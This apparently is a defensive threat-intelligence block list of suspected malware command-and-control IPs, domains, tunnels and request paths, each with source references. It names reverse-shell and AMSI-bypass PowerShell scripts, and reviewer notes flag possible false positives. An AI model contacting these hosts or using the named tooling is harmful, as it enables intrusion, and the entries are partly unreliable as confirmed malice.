# Reference: https://www.virustotal.com/gui/file/fde50d772933f871c8e67d7f2c44981b8740593f9dd5a12ef6fbe52f2f531492/detection

18.176.183.3:14612

# Reference: https://www.virustotal.com/gui/file/4377e4584c8fdfba307ac4f61b6a3ae0e93fb1708ebfc6d1723a53e8fe500941/detection

18.176.183.3:14084

# Reference: https://twitter.com/IronNetTR/status/1767991130652626995

http://185.65.202.192

# Reference: https://twitter.com/IronNetTR/status/1767991209065115925

206.166.251.44:8080

# Reference: https://twitter.com/ScumBots/status/1770559127304999047
# Reference: https://www.virustotal.com/gui/file/a9989f854fdee68ad82862be83757397bc3131e77aedcf078d31fc3ba3ece04d/detection

85.214.121.47:8080

# Reference: https://twitter.com/ScumBots/status/1772590664611459077
# Reference: https://www.virustotal.com/gui/file/ae51983d406eab5d3474be806f9f057e1a6388e02677b469977464e544f18b4c/detection

18.177.0.235:13209

# Reference: https://twitter.com/ScumBots/status/1772573040276078807
# Reference: https://www.virustotal.com/gui/file/ea9d8cbb0eaaed3fab23b069aec0ee9ac6e0fe3a6a57cbe7def486a736ac0ad5/detection

18.177.0.235:14441

# Reference: https://twitter.com/ScumBots/status/1772588140881907728
# Reference: https://www.virustotal.com/gui/file/9561282d29829885243a5bf6a5f7b5a0e3d9c4187f281a9b400c7c26cc438d95/detection

18.177.53.48:18003

# Reference: https://twitter.com/pmelson/status/1773705034892472694
# Reference: https://www.virustotal.com/gui/file/34aa011f2db60d320f9286b3f5688fe9d75473cc388e34098bed69b464c11579/detection
# Reference: https://www.virustotal.com/gui/file/039832b2b7acb64ccd9385e8e2fd7a1763d2bf0ec107d61d80c48f9241b4cb6f/detection

http://52.196.119.113

# Reference: https://www.virustotal.com/gui/file/7a46b0f4cad3859514ba19e1954a957b905e69dbd52ca7f0cd9ced44e5826f1a/detection

18.177.76.42:15494

# Reference: https://twitter.com/1ZRR4H/status/1775560879158731261
# Reference: https://www.virustotal.com/gui/file/f3821c10dba9a35fe7481cab6dc612dca66378b91037b859e5e2252321ba3ed3/detection
# Reference: https://www.virustotal.com/gui/file/7d432fbc93fb201322c6a1e1cf8d7753c5d036650aa69366205dbbb58ef06cc0/detection

http://185.236.228.29
185.236.228.29:8443

# Reference: https://twitter.com/IronNetTR/status/1777393539044757842

118.25.142.205:1337
118.25.142.205:8080

# Reference: https://twitter.com/crep1x/status/1777957087521202185
# Reference: https://www.virustotal.com/gui/ip-address/82.221.129.44/relations

advanced-ip-scann.org

# Reference: https://twitter.com/ScumBots/status/1778460591692120277
# Reference: https://www.virustotal.com/gui/file/79b6cf9670250fdadb03949552e3d73d17640b1df04ad11b6af3b2d74f2c9ba7/detection

180.184.171.155:4004

# Reference: https://twitter.com/drb_ra/status/1779870354992705630

149.28.232.182:443

# Reference: https://twitter.com/IronNetTR/status/1779989608710701261

http://23.133.88.248
62.67.52.141:8000

# Reference: https://www.virustotal.com/gui/file/dc6c7fc7353f8204e52c6e346b44ee2da18e562ef74ff77fe57f4993a52eb4ec/detection

18.141.129.246:16038
52.220.121.212:16038

# Reference: https://www.virustotal.com/gui/file/4f956c0d67e34145bdb0f7241e2c4d012e147843935d3df1eefd80c7f97524de/detection

13.229.3.203:19151
52.220.121.212:19151

# Reference: https://www.virustotal.com/gui/file/2dc64d70cd121ba2158431cf2c4379e88a8d9e96c8db6d2d4573bd0dacb712de/detection

144.76.71.93:111
powershellcmd.theworkpc.com

# Reference: https://twitter.com/ScumBots/status/1790656008173350936
# Reference: https://www.virustotal.com/gui/file/0b257b2ab2f9f1004f7a145b34dfe1376ef272f644adc0312ff7c3cf9ad0b3d6/detection
# NOTE(review): 172.217.0.0/16 looks like Google-operated address space (TODO
# confirm with whois). If so, this IP:443 is shared front-end infrastructure and
# the entry will alert on benign traffic; verify what the sample actually
# contacted before keeping it.

172.217.169.195:443

# Reference: https://twitter.com/ScumBots/status/1790827071721046438
# Reference: https://www.virustotal.com/gui/file/b7e39546b815a2128615a0f773928bd1655320956e9ed2494f8f5439cd836632/detection

18.228.115.60:10955
54.94.248.37:10955

# Reference: https://twitter.com/ScumBots/status/1790819532535214303
# Reference: https://www.virustotal.com/gui/file/2cb36e7f0db958d2f54d7db41314f394c3b4fa4f6fd4f4b442506725811ebe17/detection

3.13.191.225:16598
3.134.125.175:16598

# Reference: https://x.com/NDA0E/status/1793631858405818663
# Reference: https://pastebin.com/raw/6PTTM4MD

http://20.163.176.155
20.163.176.155:443
powershell.skype-api.co.uk

# Reference: https://x.com/ScumBots/status/1799582256777826469
# Reference: https://www.virustotal.com/gui/file/123b8d0fea7b632f597898db9f6e3795a7aa5352b7e23ff13544fb82a8fe1cd0/detection

18.228.115.60:15559
54.94.248.37:15559

# Reference: https://x.com/ScumBots/status/1799587290064322567
# Reference: https://www.virustotal.com/gui/file/fe1dd78574699a0cbd9178866f2eec401d3f931218d8cbf73ac7d94daebd87fd/detection

18.228.115.60:11160
54.94.248.37:11160

# Reference: https://x.com/ScumBots/status/1799617488180691059
# Reference: https://www.virustotal.com/gui/file/196ba4c3caecb1d450771c2582a9dd02a87bceee907a8ea0dc7cd57695cbd965/detection

18.229.146.63:10164

# Reference: https://x.com/ScumBots/status/1799657759333372393
# Reference: https://www.virustotal.com/gui/file/2ff4753d7b38f46bc7b8d32ac1f0ad0a5edbbc815fffb2426856acfb24e34a62/detection

3.13.191.225:10406
3.22.30.40:10406

# Reference: https://x.com/ScumBots/status/1800322134998188037
# Reference: https://www.virustotal.com/gui/file/184fd3350809479000bd696299c03a323bf48371170a67679f0ba8e9e7fd4b66/detection

54.94.248.37:11870

# Reference: https://x.com/ScumBots/status/1802551826874515793
# Reference: https://www.virustotal.com/gui/file/2ba5fa6b026e78675f28ac510417a767acbcb4b43d9ec5c1c4052661c2cbf9aa/detection

192.244.206.42:6724

# Reference: https://x.com/ScumBots/status/1806034772809883679
# Reference: https://www.virustotal.com/gui/file/0c3ea8f0e65eb748a8b3e7378d02544e01581f1b6fb3e1d57a1af60d32001f38/detection

9655-96-126-112-246.ngrok-free.app

# Reference: https://www.virustotal.com/gui/file/0ca46fb10da403fd20317cbd55434388275c7e9abba697ca4c9916f241ff53f6/detection

fb6mj2jff0oz3rop.myfritz.net

# Reference: https://x.com/malwrhunterteam/status/1817215954247729266
# Reference: https://www.virustotal.com/gui/file/da9f9b521be52116d29654789ea62091e7cffd0ae875e69d5030305307c3411a/detection

s4m5vyfx72sjlsuzt72fabn3iv2igwovo3azn27im3xz3emt47gk6zad.onion

# Reference: https://x.com/malwrhunterteam/status/1818727670911582232
# Reference: https://www.virustotal.com/gui/file/181fe99c16fa6cc87a3161bc08a9e2dbd17531c7d713b09d8567c1b3debe121f/detection

37.143.129.165:9050
37.143.129.165:9999
opioem3zmp3bgx3qjqkh6vimkdoerrwh3uhawklm5ndv5e7k3t4edbqd.onion

# Reference: https://x.com/malwrhunterteam/status/1821842795918729623
# Reference: https://www.virustotal.com/gui/file/9e3d9a65d37163a70d1578971179bad24671d08ec12bd4d5d87b523b89fa1dc6/detection

gravitytop.duckdns.org

# Reference: https://x.com/k3yp0d/status/1822584994230931669
# Reference: https://www.virustotal.com/gui/file/20a30be9df8e2e1244afebc48d8bedf728b2ee42c4c8c89757b37b10361a494d/detection

159.89.205.132:4443

# Reference: https://www.virustotal.com/gui/file/edd8d665474246b3dcef184ba9b18479b8d33ee0232b918b2fe35f43b969875e/detection

118.26.38.52:8090

# Reference: https://www.virustotal.com/gui/file/772dc10ce0c1a5c6e955fc82ab80fcca15307876832aae0ad52c0ea8b5fe1973/detection

118.26.38.52:8091

# Reference: https://x.com/malwrhunterteam/status/1824049414341534204
# Reference: https://www.virustotal.com/gui/file/9423adbc1793e7b785dd96cbac37e651d8988aa7870b795613c4a12674e21afb/detection
# Reference: https://www.virustotal.com/gui/file/30a645175c581415d55d434e7feefbddee0e0ba0b584a27699d2b7be2de7bca6/detection

146.190.90.45:8080

# Reference: https://x.com/drb_ra/status/1825707175093661803

52.230.83.254:443

# Reference: https://www.virustotal.com/gui/file/e8639f74f8209c9f0bc1ddae413a6721f30acdc63e3b44635bb0e7d0df83ee10/detection

52.230.83.254:5678

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/IPPortC2s-30day.csv

3.121.42.179:443

# Reference: https://www.virustotal.com/gui/file/b456ed7fe5e86e361935de61a4b6e49a975c06f6737c9a6dc06f64d637ddcf50/detection

193.117.208.101:7777

# Reference: https://x.com/malwrhunterteam/status/1830886952180068808
# Reference: https://www.virustotal.com/gui/file/f44bdaa55e1365c6628a2e3c09907cb340db29c648a3efb2900813c06caac060/detection
# Reference: https://www.virustotal.com/gui/file/d6513550cc5256ece6007aeafe9d39c4cda4c8ccab2daebe5c48d0583e1b02f6/detection
# Reference: https://www.virustotal.com/gui/file/8de9581d99d64252080d4a00bb75660b3d95bd05772556a0f1cb21bb68afa166/detection

207.154.255.134:8443
/ZIen7RH/1zFNrVrn0
/1zFNrVrn0
/ZIen7RH

# Reference: https://x.com/byrne_emmy12099/status/1830826203936366835
# Reference: https://www.virustotal.com/gui/file/32033f5b4596caa21f8e59fa3b0ae140a30b10a7fb982a383b0c5722b851d2b2/detection

http://117.72.70.169

# Reference: https://www.virustotal.com/gui/file/c0aecec5b4f0aef02bf9787e0e7aa390a38764611a6f756cebf0ebd4898d7ea0/detection

23.163.0.72:443

# Reference: https://x.com/malwrhunterteam/status/1831329411083256023
# Reference: https://www.virustotal.com/gui/file/4f165bf8290bca3fd8056155899b78c2c745e675d1edfc4cf3cabc5302834453/detection
# Reference: https://www.virustotal.com/gui/file/95ebf269b7b7e6d405378005909448721dea4913b50311050efa01f3918e23dd/detection

http://185.196.10.14
185.196.10.14:443
ms-crt-update.com
wnd-ls.info

# Reference: https://x.com/banthisguy9349/status/1835386974795915677
# NOTE(review): the two path-only entries below are not bound to a host, so they
# match that request path on any server. Invoke-PowerShellTcp.ps1 is a publicly
# available script name that also turns up in authorized testing, so hits on the
# path alone need triage against the source/destination context.

211.196.223.62:9999
/Invoke-PowerShellTcp.ps1
/Invoke-PowerShellTcp1.ps1

# Reference: https://x.com/kddx0178318/status/1836032502118469912

pub-26ee9be236b54d0cb1b570a203543b93.r2.dev

# Reference: https://x.com/karol_paciorek/status/1838226912264479036
# Reference: https://tria.ge/240923-rpw62aydkj/behavioral2
# Reference: https://www.virustotal.com/gui/file/c96b8380f3acee84358759a9b70a5e7f46b0b0084b875ec82d6cd787a72f727d/detection
# Reference: https://www.virustotal.com/gui/file/8df8bac8fe6e592dd7a859c85cd85a76744e3236c52f3754328d99daa8e7e963/detection
# Reference: https://www.virustotal.com/gui/file/572add5dac2c74afce068a401eaa207b833bb86f041606a1dbb6903566a6ed22/detection
# Reference: https://www.virustotal.com/gui/file/369beedc04350f9913cc3806ebf5395de318abca9cead9b6f69565c974bedf4b/detection
# Reference: https://www.virustotal.com/gui/file/2c713900f23b2e85b1c0e02b6dd134c05fcfb1f5e6b02c2950cdbf7d1c7d24a4/detection

172.111.186.180:12284
154.21.14.89:15488
gibbooc2.com

# Reference: https://www.virustotal.com/gui/file/21e9c3fe8da1816b523825d1891ee899f2b93b67c812a746d1cc19ad1479ae18/detection

188.40.59.208:8080
jffjdjkbfek.000webhostapp.com

# Reference: https://www.virustotal.com/gui/file/016830208b67f225761df7b598b75cd7c892ad856b34c3f5116b1c458cde5efe/detection

91.92.250.115:4443

# Reference: https://x.com/malwrhunterteam/status/1845029320311374203
# Reference: https://www.virustotal.com/gui/file/db114465cab2a9be7e57e18abfddfd9c7ecfd121090c345698f5c54bb037ba30/detection
# Reference: https://www.virustotal.com/gui/file/c69ab262ac3f73277c4b9a777a408f57feb618e2e00bc2e66e8d97274083c742/detection
# Reference: https://www.virustotal.com/gui/file/0d92e9fa4eebb8988f8c106499329a0ad0773d0cc1cc2ff254b1da592cc08afa/detection

http://212.232.22.140
212.232.22.140:443

# Reference: https://x.com/StrikeReadyLabs/status/1846335184213258436
# Reference: https://www.virustotal.com/gui/file/8229f281a93f18612a47843aa69e94312b52180e7f775fd58e5ea04608e23bd0/detection

jackcontentmkt.com

# Reference: https://x.com/suyog41/status/1848301462553813462
# Reference: https://x.com/suyog41/status/1848338824960806944
# Reference: https://www.virustotal.com/gui/file/6981a60d432d6b56980932f2a645813dc8e4a7987c29fabd810e9040f97ea6b7/detection
# Reference: https://www.virustotal.com/gui/file/2e25e45dbc3106141933db4d006db37e7054cff7007825f429a11a82d8f4e9eb/detection

charleskeith-group.com
rovalfashion.blog
career.charleskeith-group.com
documents.rovalfashion.blog

# Reference: https://www.virustotal.com/gui/file/2fd743a0666b4d990a40cbe83636f7c51423860a19904553c8faac7edd11dec6/detection

qq7u0.com
t.qq7u0.com

# Reference: https://x.com/k3yp0d/status/1851189193143189730
# Reference: https://www.virustotal.com/gui/file/47c38f8d21240a76cccf0b6000ee571d1b46b0da5482ab71bef2ae0c935e7b50/detection

65.38.121.107:12345

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2024-11-10)

176.111.174.138:443
47.76.86.199:443

# Reference: https://x.com/malwrhunterteam/status/1861740034883305694
# Reference: https://www.virustotal.com/gui/file/9ee44af1c67b6391151d300afa5b7625339a5cc0dcfacb19f6f43a8122c23efb/detection
# Reference: https://www.virustotal.com/gui/file/330c264bbb3a4ee3e6ffafd16e599c16e76088793ae68b216fa5d17bdde33584/detection
# Reference: https://www.virustotal.com/gui/file/1dee11c1282c60ec5b51dd3b83db97ce1a1f65953ea75825e188a6204eda327f/detection

178.215.224.246:9999

# Reference: https://x.com/malwrhunterteam/status/1862624900592119903
# Reference: https://www.virustotal.com/gui/file/e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819/detection

http://79.124.78.109

# Reference: https://x.com/redrabytes/status/1866254308800446653
# Reference: https://www.virustotal.com/gui/file/002c21418485ce37db73718090b4cf0963343ec57858984176c29828433a7ce8/detection
# Reference: https://www.virustotal.com/gui/file/0e7d5f7e7a774c2fdafc243face49e36d09df8b6f6d7fb8fb45012280ff8fd67/detection

http://31.13.224.16
31.13.224.16:1445

# Reference: https://x.com/naumovax/status/1866478008430625178
# Reference: https://tria.ge/241209-g5d1aazphz/behavioral1
# Reference: https://www.virustotal.com/gui/file/aa823a279a54bf15f82b2f1dadd9f75c8dc9b3a088b289f21c5769bef199fa08/detection

147.185.221.24:20600
michael-currently.gl.at.ply.gg

# Reference: https://www.virustotal.com/gui/file/70278ca40fa83bb0ece05e455ac3907aba311f004ba10f8d723cde1dda8caf89/detection

officeupdate.live

# Reference: https://x.com/banthisguy9349/status/1867487667853701258
# Reference: https://www.virustotal.com/gui/file/1ee2a9a7c6716e3244755860dde26392068a6dadbccc530aecd51914257a5a51/detection

http://15.161.105.91
15.161.105.91:4444

# Reference: https://x.com/byrne_emmy12099/status/1868220373092999635
# Reference: https://www.virustotal.com/gui/file/da3736e0a496b841d13da123473bb9d630ba78b68a5de99be2476b8ed1d02658/detection

5.44.32.90:9191

# Reference: https://www.virustotal.com/gui/file/167451dd9f09180567907a96316a2680b67157a92c14c753465ed5e3d5e40703/detection

api-conect-v1.digital
web.api-conect-v1.digital

# Reference: https://www.virustotal.com/gui/ip-address/212.224.93.241/relations
# Reference: https://app.validin.com/detail?type=dom&find=api-conect-v1.org#tab=host_pairs
# Reference: https://app.validin.com/detail?find=Nota%20Fiscal&type=raw&ref_id=5663d651f5d#tab=host_pairs
# Reference: https://www.virustotal.com/gui/file/64edce40efb957d4faf53ead6b82fb70b02c05e1dda4adb9c0e3535396374bbb/detection
# Reference: https://www.virustotal.com/gui/file/b2f2fce332ae6659f9b83551bacea0eac088d4993aa2aea569714109724cda76/detection
# Reference: https://www.virustotal.com/gui/file/db5bd2d7f564d3563aa46fc3521a3a1c40914b39ab1c215d5af39a1bff1939e0/detection

api-conect-v1.org
bot-interaction-navegador.click
bot-interaction-navegador.com
bot-interaction-navegador.net
bot-interaction-navegador.online
portifolio-advanced.help
sign-in-portfolio.pro

# Reference: https://x.com/ShanHolo/status/1870776463554982198
# Reference: https://www.virustotal.com/gui/file/a93016ca786dd53269892b81f2e49c50556faa988fb29c8753de411f521a2caf/detection

204.216.222.72:4444

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2025-01-02)

18.220.100.26:443
91.240.118.204:443

# Reference: https://www.virustotal.com/gui/file/f83fee229ddbe821bf4710dee92cc02196689646fd79ab372b2d9cb940dd394f/detection
# Reference: https://www.virustotal.com/gui/file/6fa943eb4c0a5ad9993da79e019bb62d00246103b9fd13e93986098072727596/detection
# Reference: https://www.virustotal.com/gui/file/2050cbdb74065a62353a2a2bcee6486113bccc3d1e071ffb1b395e856a52e214/detection

vilkasbuilders.com

# Reference: https://x.com/StrikeReadyLabs/status/1879232423483015275
# Reference: https://www.virustotal.com/gui/file/92651b71fe52dd4ec8d3d4dfbba974d4e75f7fc68717d8e845a988600bc1723a/detection
# Reference: https://www.virustotal.com/gui/file/db791160ec45c955a79be8361055c256e5fc6c3850fa1fa2298205f2ff0cf1f0/detection

codebizz.com/7896745657879090.mp4
codebizz.com/NETJIQHP.exe
codebizz.com/SBBFernverkehr.pdf

# Reference: https://www.virustotal.com/gui/file/d1a30376318ac2c047f99506508d4a10fbdf31f76d51f47d71147b3a66a66894/detection

fill-tomap.com

# Reference: https://x.com/skocherhan/status/1882669372973490417
# Reference: https://www.virustotal.com/gui/file/6a099d194d5da3e8920ecd9b2688e77dbab1ac420b2557f40a88edb649b339d6/detection
# Reference: https://www.virustotal.com/gui/file/ce85a2c0c46cdcd0c80033c50a7300b97f904045ede5b3644c7f3c1bab6c7f6f/detection

cryptopotato.net

# Reference: https://x.com/drb_ra/status/1883872057005363506

185.147.124.10:443

# Reference: https://x.com/malware_traffic/status/1884476331821326816
# Reference: https://www.malware-traffic-analysis.net/2025/01/28/index.html
# Reference: https://www.virustotal.com/gui/file/2dd4dba195a2994751e11f855a1a4d9f6ca384867b8e5f62b0e692729603fe05/detection

http://64.52.80.211
86.107.101.93:25658
compaq-hr-buyers-where.trycloudflare.com

# Reference: https://x.com/malwrhunterteam/status/1888948304005746852
# Reference: https://www.virustotal.com/gui/file/ede28fc0163702956fb6b356242d0089084a084746f6da3a8ce2f25e2a09fc1e/detection
# Reference: https://www.virustotal.com/gui/file/6e4d098ea581c6961d4777d4d57733a3b8a68ccec6cf8067557b1748380f4798/detection
# Reference: https://www.virustotal.com/gui/file/2436a5dc0fae2fd6c7d53d3cf78658b88c47ed58006074c580cb882408e1317d/detection

45.192.170.202:18854
45.192.170.202:18855
45.192.170.202:18856
45.192.170.202:8850
45.192.170.202:8852

# Reference: https://x.com/malwrhunterteam/status/1890305544545611888
# Reference: https://www.virustotal.com/gui/file/d28a119903c477aede62a18af5e441bdbe0359ac450612cfc453c874ac1952e8/detection
# Reference: https://www.virustotal.com/gui/file/630c67766d2464e2e8870167b0f6f36f451b0b6d79932366960f668346986b40/detection

45.128.12.101:1340

# Reference: https://www.virustotal.com/gui/file/042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635/detection
# Reference: https://www.virustotal.com/gui/file/5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d/detection
# Reference: https://www.virustotal.com/gui/file/6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875/detection

91.206.178.120:5001

# Reference: https://www.virustotal.com/gui/file/a7d093616150edffba8ab7ae589dae0097dafb2dedc90fa3b9437cdef09bf42d/detection
# Reference: https://www.virustotal.com/gui/file/1df18eee15111abda5fb1430aada1ed2a8dd1adfed9f4e6c48d53886a0949d43/detection

keytool.cc
adobecc.keytool.cc
capcut.keytool.cc
cupcut.keytool.cc
office365.keytool.cc
photoshop.keytool.cc
premiere.keytool.cc
spotify.keytool.cc
windows.keytool.cc

# Reference: https://www.virustotal.com/gui/file/12b061ecc807165c160ad96f22cd922a9c3a831358126dbd8d42242068fb821f/detection

rejoseluluar.com

# Reference: https://x.com/skocherhan/status/1891413497809903645
# Reference: https://www.virustotal.com/gui/file/356a6936bc3e59716365a95d28fd715454bfad2c6cd8d8d70a23b3a357c69ab0/detection

xegan4.site

# Reference: https://x.com/malwrhunterteam/status/1891926759408279775
# Reference: https://x.com/ShanHolo/status/1892214399030419719
# Reference: https://www.virustotal.com/gui/file/eb8da26034035f08946acb6fc127e3b2db884a024a61aea99397c46aedc70145/detection

http://146.185.233.96

# Reference: https://x.com/JAMESWT_MHT/status/1892930111625678859
# Reference: https://tria.ge/250221-qlvy5avjt5/behavioral2

/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1
/BlackShell256/
/Invoke-NullAMSI.ps1

# Reference: https://x.com/skocherhan/status/1893319241002095020
# Reference: https://www.virustotal.com/gui/file/6ecf5d71e9e538d4cc59db73b3b0314cd663f1d09ff27b560871bc8742a9b5d4/detection
# Reference: https://www.virustotal.com/gui/file/787c1128407b755ed110651a47f19fddeb7074168ead5cf6d21a5ecdb8547eab/detection
# Reference: https://www.virustotal.com/gui/file/dbcb23be28a736f1f1564f879d8c437f8af5d43ed037bce0c87a644f1a931cea/detection

busforua.world

# Reference: https://github.com/hagezi/dns-blocklists/issues/5317
# Reference: https://www.virustotal.com/gui/file/4f9ec5212d6eac6586ca4a32cd3ef4669c08b5b526f70940b05874939e5eb717/detection

sportsspot-moviebuffs.com
92mapped03.sportsspot-moviebuffs.com
apped01.sportsspot-moviebuffs.com
mapped01.sportsspot-moviebuffs.com
mapped02.sportsspot-moviebuffs.com
mapped03.sportsspot-moviebuffs.com
mapped04.sportsspot-moviebuffs.com
mapped11111111.sportsspot-moviebuffs.com
mapped11111112.sportsspot-moviebuffs.com
mapped11111113.sportsspot-moviebuffs.com
mapped11111114.sportsspot-moviebuffs.com
mapped63.sportsspot-moviebuffs.com
mappede1.sportsspot-moviebuffs.com
s3-us-north-1.sportsspot-moviebuffs.com

# Reference: https://x.com/malwrhunterteam/status/1895028447170408590
# Reference: https://www.virustotal.com/gui/file/a859c1673c5db25b2a04008508034d36c9a329001f506e617a2599bbc734142c/detection
# Reference: https://www.virustotal.com/gui/file/a7828452da13948111071f1903b1bfbd19874ddb90e89694fd685dc0bbef2af6/detection

23.236.59.72:4444
overengine.store
data.overengine.store
update.overengine.store

# Reference: https://x.com/solostalking/status/1897360674185208022

forbescheck.top
scansol.in
twitter.my
safecheck.mosco.cc

# Reference: https://www.virustotal.com/gui/file/0ed2a4a890b4edad5600f94d7816ce84a24d15647f7c3efa703f4eefeb82890a/detection

microsoftnetservice.duckdns.org

# Reference: https://x.com/malwrhunterteam/status/1902336307528913245
# Reference: https://www.virustotal.com/gui/file/72ecbebb658ea1fe80515d96cb5bd4a978a73b7c60552ab9c9b17aec20f4c28a/detection

cloud-ddie.click
dropxfile.xyz
jkboard.help
nhappk.click
ntspk1.top
app.jkboard.help
mst.jkboard.help

# Reference: https://x.com/Jane_0sint/status/1902465896897040658
# Reference: https://app.any.run/tasks/1153f0ba-2645-47fe-9f73-4849cdf73fb5
# Reference: https://app.any.run/tasks/82eafd8e-c3db-415e-a84d-07632af7ad90

45.145.91.164:64830

# Reference: https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2
# Reference: https://app.validin.com/detail?find=%3A%3A%3A%22description%22%3A%22SchemaPI%20ile%20kaliteli%20backlink%27ler%20edinin%20ve%20arama%20motorlar%C4%B1nda%20%C3%BCst%20s%C4%B1ralara%20%C3%A7%C4%B1k%C4%B1n.%20SEO%20performans%C4%B1n%C4%B1z%C4%B1%20art%C4%B1rmak%20i%C3%A7in%20%C3%B6zel%20olarak%20tasarlanm%C4%B1%C5%9F%20%C3%A7%C3%B6z%C3%BCmlerimizle%20tan%C4%B1%C5%9F%C4%B1n.%22&type=raw&ref_id=3803bae4989#tab=host_pairs (# 2025-05-02)
# Reference: https://www.virustotal.com/gui/file/0a91a18d9d2bd24e679543fc956746fd8cdccc55939853def0a790dfeb132343/detection
# Reference: https://www.virustotal.com/gui/file/334c494241e9f60a9ed9005c31ee91c02d4467f417beec166a2dbfc885da4bdb/detection
# Reference: https://www.virustotal.com/gui/file/5720662d40be94b68735a96ef056f5a777c879db3af470c01ad2297a15a1d06a/detection
# Reference: https://www.virustotal.com/gui/file/675a0935b07fd067d0dd9a0b8be548943034ca197b2fe1c04d36d1c86989672f/detection
# Reference: https://www.virustotal.com/gui/file/d46d64606d1b9e21eb0c9095fea389b335b8f01c17cb68ba9699dee2a06c5282/detection

http://195.177.95.169
http://213.209.150.191
3dflow-85wo.pages.dev
3dlinker-gs9y.pages.dev
3dmeshhub-k35m.pages.dev
cloud3d-k5sa.pages.dev
cloudforge-g9gi.pages.dev
cloudforge-p9cm.pages.dev
devcloud-5lpl.pages.dev
devcloud-63gg.pages.dev
devcore-2lef.pages.dev
devcore-ec8q.pages.dev
devgrid-1wsz.pages.dev
devgrid-72kx.pages.dev
devhub-dn06.pages.dev
dmca-hub-r2ao.pages.dev
idufgljr.procansopa1987.workers.dev
meshlinker-2imf.pages.dev
polybase-6e8v.pages.dev
procansopa1987.workers.dev
renderbase-27s7.pages.dev
renderbase-tp71.pages.dev
renderhub-30pd.pages.dev
renderhub-5bam.pages.dev
rendernest-54x9.pages.dev
rendernest-en88.pages.dev
rendernest-y4et.pages.dev

# Reference: https://x.com/malwrhunterteam/status/1910330072596148616
# Reference: https://www.virustotal.com/gui/file/000dad70daa62b07d6216c76e9bf2763871bce36e6bbff9178ce4347a3b9d131/detection

cavradocuments.top
api.cavradocuments.top
app.cavradocuments.top
documents.cavradocuments.top

# Reference: https://x.com/moneroon/status/1910672445670842395
# Reference: https://www.virustotal.com/gui/file/63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6/detection

45.79.43.128:8888

# Reference: https://www.virustotal.com/gui/file/283065d0478086711e8233bbc086a94ffca668ad9aab3b7de0aef9d9d44f3b60/detection

micrasoftsuport.uk
help.micrasoftsuport.uk

# Reference: https://x.com/abuse_ch/status/1912534630013481357
# Reference: https://app.validin.com/detail?find=4d7b998f9ffaf8f1451817aee8d0499635485d41&type=hash&ref_id=adf8c5b44f6#tab=host_pairs (# 2025-04-16)
# Reference: https://www.virustotal.com/gui/file/2cdacba9a2c3997c3bc40b721f08b207f11098d7bdf3a7b487e4202e854c08e5/detection

185.170.153.104:3000
5.252.153.120:3000
5.252.153.120:8082
5.252.153.120:8888
5.252.153.122:3000
5.252.153.122:7000
66.63.187.72:3000
85.209.153.84:3000
95.164.53.146:3000
95.164.53.146:8089

# Reference: https://blog.talosintelligence.com/emerging-interlock-ransomware/
# Reference: https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/
# Reference: https://github.com/Cisco-Talos/IOCs/blob/main/2024/11/emerging-interlock-ransomware.txt

45.61.136.228:8080
64.95.10.95:8080
complement-parliamentary-chairs-hc.trycloudflare.com
pipe-hawaii-monkey-automatic.trycloudflare.com
investigators-boxing-trademark-threatened.trycloudflare.com
sublime-forecasts-pale-scored.trycloudflare.com
medicine-podcasts-halo-expected.trycloudflare.com
una-idol-ta-missile.trycloudflare.com
views-ethics-orientation-roommate.trycloudflare.com
refrigerator-cheers-indicator-ferrari.trycloudflare.com
securities-variance-vocal-temporal.trycloudflare.com
musicians-implied-less-model.trycloudflare.com
dc-broader-green-norwegian.trycloudflare.com
scientific-shown-desperate-ratio.trycloudflare.com
phones-pichunter-businesses-drop.trycloudflare.com
pub-motorola-viking-charger.trycloudflare.com
fotos-phillips-princess-baker.trycloudflare.com
california-appeals-pilot-harper.trycloudflare.com
diff-beats-belize-chapter.trycloudflare.com
suffering-arnold-satisfaction-prior.trycloudflare.com
washing-cartridges-watts-flags.trycloudflare.com
open-exceptions-cleared-feelings.trycloudflare.com
analytical-russell-cincinnati-settings.trycloudflare.com
photo-auction-visual-gains.trycloudflare.com
mortgage-i-concrete-origins.trycloudflare.com
casting-advisors-older-invitations.trycloudflare.com
forest-offensive-height-letters.trycloudflare.com
speak-head-somebody-stays.trycloudflare.com
lancaster-sean-initial-ru.trycloudflare.com
strain-brighton-focused-kw.trycloudflare.com

# Reference: https://www.virustotal.com/gui/file/d718441a0ab4697b70fab53e6a4c3b463e549443d259abf08b2f57806f96b0b7/detection
# Reference: https://www.virustotal.com/gui/file/0d88e1060d63d4f92adc3c5ac5837d774dba116bc133b4ae548a54de3ca1a9d8/detection

you-hub.online
youhub.shop

# Reference: https://x.com/malwrhunterteam/status/1912943905915760995
# Reference: https://www.virustotal.com/gui/file/170fd5675f58c076fc371a7dbd7356134ac5e0735490be682b8ef0aa922fb89a/detection

eclectic-twilight-7a616e.netlify.app

# Reference: https://x.com/malwrhunterteam/status/1913154621456998719
# Reference: https://www.virustotal.com/gui/file/6a82e620fdcc5e11e5aa776bd70c120dfb83a921d89edcfe40ed899d227e2ff1/detection

http://34.132.177.150
34.132.177.150:4444
repoupdater.ddns.net
/ozS3jlAM9V/

# Reference: https://x.com/JAMESWT_WT/status/1913476420182892665

http://185.39.17.70

# Reference: https://www.virustotal.com/gui/file/b4cca39ff758883d5e0ad9feea98b1ddf6031bf0ca86d623631fb7f8bf09ae46/detection
# Reference: https://www.virustotal.com/gui/file/52c847b8a115eb50a63d8c2f9ea4ac6cdd33302dd05b239d685670d14f4ebf85/detection

http://62.113.114.117

# Reference: https://www.virustotal.com/gui/file/f9b1b0bb01681d70f40a80ad6ca191f0bdd3d10260ed6dabee6c5d93783121fd/detection

duolingos.com

# Reference: https://threatfox.abuse.ch/browse/tag/FakeCaptcha/ (# 2025-04-20)
